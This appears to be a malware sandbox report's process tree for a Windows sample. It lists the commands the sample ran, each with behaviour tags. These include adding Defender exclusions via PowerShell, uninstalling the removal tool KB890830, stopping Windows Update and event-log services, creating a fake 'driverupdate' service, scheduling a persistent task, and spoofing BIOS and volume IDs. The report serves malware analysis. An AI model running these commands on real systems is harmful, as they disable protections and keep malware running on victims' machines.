- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB4⤵
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13740HP-TRGT23541AB5⤵
- Executes dropped EXE
PID:3652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV4⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213743HP-TRGT1522RV5⤵
- Executes dropped EXE
PID:1984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG4⤵PID:4044
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813743HP-TRGT1522SG5⤵
- Executes dropped EXE
PID:2328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto4⤵PID:732
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto5⤵
- Executes dropped EXE
PID:4880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL4⤵PID:2444
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513743HP-TRGT1522SL5⤵
- Executes dropped EXE
PID:440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA4⤵PID:4512
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413747HP-TRGT12270FA5⤵
- Executes dropped EXE
PID:1428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU4⤵PID:2796
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613747HP-TRGT12270FU5⤵
- Executes dropped EXE
PID:1440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ4⤵PID:1972
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313747HP-TRGT12270DQ5⤵
- Executes dropped EXE
PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST4⤵PID:3696
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713747HP-TRGT12270MST5⤵
- Executes dropped EXE
PID:812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF4⤵PID:4624
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF5⤵
- Executes dropped EXE
PID:1396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB4⤵PID:3624
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13766HP-TRGT11225AB5⤵
- Executes dropped EXE
PID:4880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV4⤵PID:2356
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213766HP-TRGT11225RV5⤵
- Executes dropped EXE
PID:3064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG4⤵PID:3976
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813766HP-TRGT11225SG5⤵
- Executes dropped EXE
PID:2268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto4⤵PID:2232
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto5⤵
- Executes dropped EXE
PID:3488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL4⤵PID:4652
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513766HP-TRGT11225SL5⤵
- Executes dropped EXE
PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA4⤵PID:4172
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413766HP-TRGT11225FA5⤵
- Executes dropped EXE
PID:3184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU4⤵PID:1296
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613766HP-TRGT11225FU5⤵
- Executes dropped EXE
PID:1348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ4⤵PID:3436
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313766HP-TRGT11225DQ5⤵
- Executes dropped EXE
PID:4920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST4⤵PID:4544
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713766HP-TRGT11225MST5⤵
- Executes dropped EXE
PID:1276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF4⤵PID:3540
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF5⤵
- Executes dropped EXE
PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB4⤵PID:2340
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13786HP-TRGT10179AB5⤵
- Executes dropped EXE
PID:3404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV4⤵PID:2544
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213786HP-TRGT10179RV5⤵
- Executes dropped EXE
PID:4988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG4⤵PID:2500
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813786HP-TRGT10179SG5⤵
- Executes dropped EXE
PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto4⤵PID:4348
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto5⤵
- Executes dropped EXE
PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL4⤵PID:404
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513786HP-TRGT10179SL5⤵
- Executes dropped EXE
PID:2732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA4⤵PID:4312
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413786HP-TRGT10179FA5⤵
- Executes dropped EXE
PID:4056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU4⤵PID:1972
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613786HP-TRGT10179FU5⤵
- Executes dropped EXE
PID:732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ4⤵PID:1984
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313786HP-TRGT10179DQ5⤵
- Executes dropped EXE
PID:3832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST4⤵PID:4984
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713786HP-TRGT10179MST5⤵
- Executes dropped EXE
PID:4680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF4⤵PID:2228
-
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exeC:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF5⤵
- Executes dropped EXE
PID:856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9STD-728M4⤵PID:1848
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9STD-728M5⤵
- Executes dropped EXE
PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: L3HH-BOM74⤵PID:4108
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe b: L3HH-BOM75⤵
- Executes dropped EXE
PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: LCAU-R7JM4⤵PID:3520
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe c: LCAU-R7JM5⤵
- Executes dropped EXE
PID:4708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: MIMF-CKII4⤵PID:900
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe d: MIMF-CKII5⤵
- Executes dropped EXE
PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: IDOC-5UBC4⤵PID:1512
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe e: IDOC-5UBC5⤵
- Executes dropped EXE
PID:3140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: OK55-44IB4⤵PID:1672
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe f: OK55-44IB5⤵
- Executes dropped EXE
PID:452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 1V8C-OFFM4⤵PID:1076
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2168
-
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 1V8C-OFFM5⤵
- Executes dropped EXE
PID:3372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: ES01-2ISC4⤵PID:2456
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe h: ES01-2ISC5⤵
- Executes dropped EXE
PID:4520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: DG7N-0PH64⤵PID:2764
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1984
-
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe i: DG7N-0PH65⤵
- Executes dropped EXE
PID:3516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 4OPL-NR0L4⤵PID:4544
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2616
-
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 4OPL-NR0L5⤵
- Executes dropped EXE
PID:1196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: AIU0-JR6C4⤵PID:2496
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe k: AIU0-JR6C5⤵
- Executes dropped EXE
PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: K4SE-OBJ54⤵PID:2276
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe l: K4SE-OBJ55⤵PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: ITOB-656E4⤵PID:3692
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe m: ITOB-656E5⤵PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: ELPA-BVHJ4⤵PID:3280
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe n: ELPA-BVHJ5⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TUUN-ZIF64⤵PID:736
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:760
-
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TUUN-ZIF65⤵PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 3IFZ-F8R84⤵PID:2396
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 3IFZ-F8R85⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: I3BO-LVNZ4⤵PID:2344
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe r: I3BO-LVNZ5⤵PID:436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 6IR5-E8504⤵PID:4888
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 6IR5-E8505⤵PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7JH1-CGH24⤵PID:4836
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7JH1-CGH25⤵PID:3104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6PP0-BHZ74⤵PID:3020
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6PP0-BHZ75⤵PID:3856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KUMP-L1814⤵PID:4828
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KUMP-L1815⤵PID:2724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: BUED-JILZ4⤵PID:4188
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe y: BUED-JILZ5⤵PID:3432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: NRC2-CPJG4⤵PID:4432
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2232
-
-
C:\ProgramData\Microsoft\Windows\Volumeid64.exeC:\ProgramData\Microsoft\Windows\Volumeid64.exe z: NRC2-CPJG5⤵PID:812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg4⤵PID:5036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm4⤵PID:1644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe4⤵PID:3704
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys4⤵PID:1836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys4⤵PID:5128
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe4⤵PID:5188
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat4⤵PID:5244
-
-
-
C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\ChainReview\sphyperRuntimedhcpSvc.exe"C:\ChainReview/sphyperRuntimedhcpSvc.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\DESIGNER\csrss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\SearchApp.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ja-JP\fontdrvhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\conhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2120
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KnrOHCCDDZ.bat"7⤵PID:2792
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:2616
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
PID:208
-
-
C:\Windows\en-US\conhost.exe"C:\Windows\en-US\conhost.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:4524
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\conhostsft.exe"C:\Users\Admin\AppData\Roaming\conhostsft.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Users\Admin\AppData\Roaming\.conhostsft.exe"C:\Users\Admin\AppData\Roaming\.conhostsft.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1908 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
PID:2680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4480
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:3140
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:3348
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:3660 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2444
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:1824
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:1296
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:632
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵PID:4536
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵PID:4616
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:208
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵PID:3540
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵PID:1004
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "driverupdate"5⤵
- Launches sc.exe
PID:2112
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"5⤵
- Launches sc.exe
PID:2136
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:1216 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2240
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "driverupdate"5⤵
- Launches sc.exe
PID:1572
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1236
-
